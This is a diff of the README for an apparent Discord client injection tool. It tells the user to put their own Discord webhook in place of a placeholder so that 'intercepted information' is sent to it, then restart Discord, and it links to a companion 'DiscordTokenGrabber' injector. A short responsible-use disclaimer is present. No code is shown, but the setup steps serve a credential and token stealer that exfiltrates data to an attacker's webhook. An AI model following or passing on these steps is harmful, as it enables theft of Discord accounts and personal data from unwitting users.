k4itrun/discord-injection/readme.md

 3. Replace `%WEBHOOK%` with your Discord webhook.
 The intercepted information will be sent to this webhook.
 4. Restart Discord

+# Mode
+- If you want to use the **injector** based on Nodejs and with many features, enter [here](https://github.com/k4itrun/DiscordTokenGrabber) it is free

+### Note
-Note: Use this PoC responsibly and only on applications and systems you have explicit permission to test.
+Use this PoC responsibly and only on applications and systems you have explicit permission to test.
 Unauthorized use may violate terms of service and legal agreements.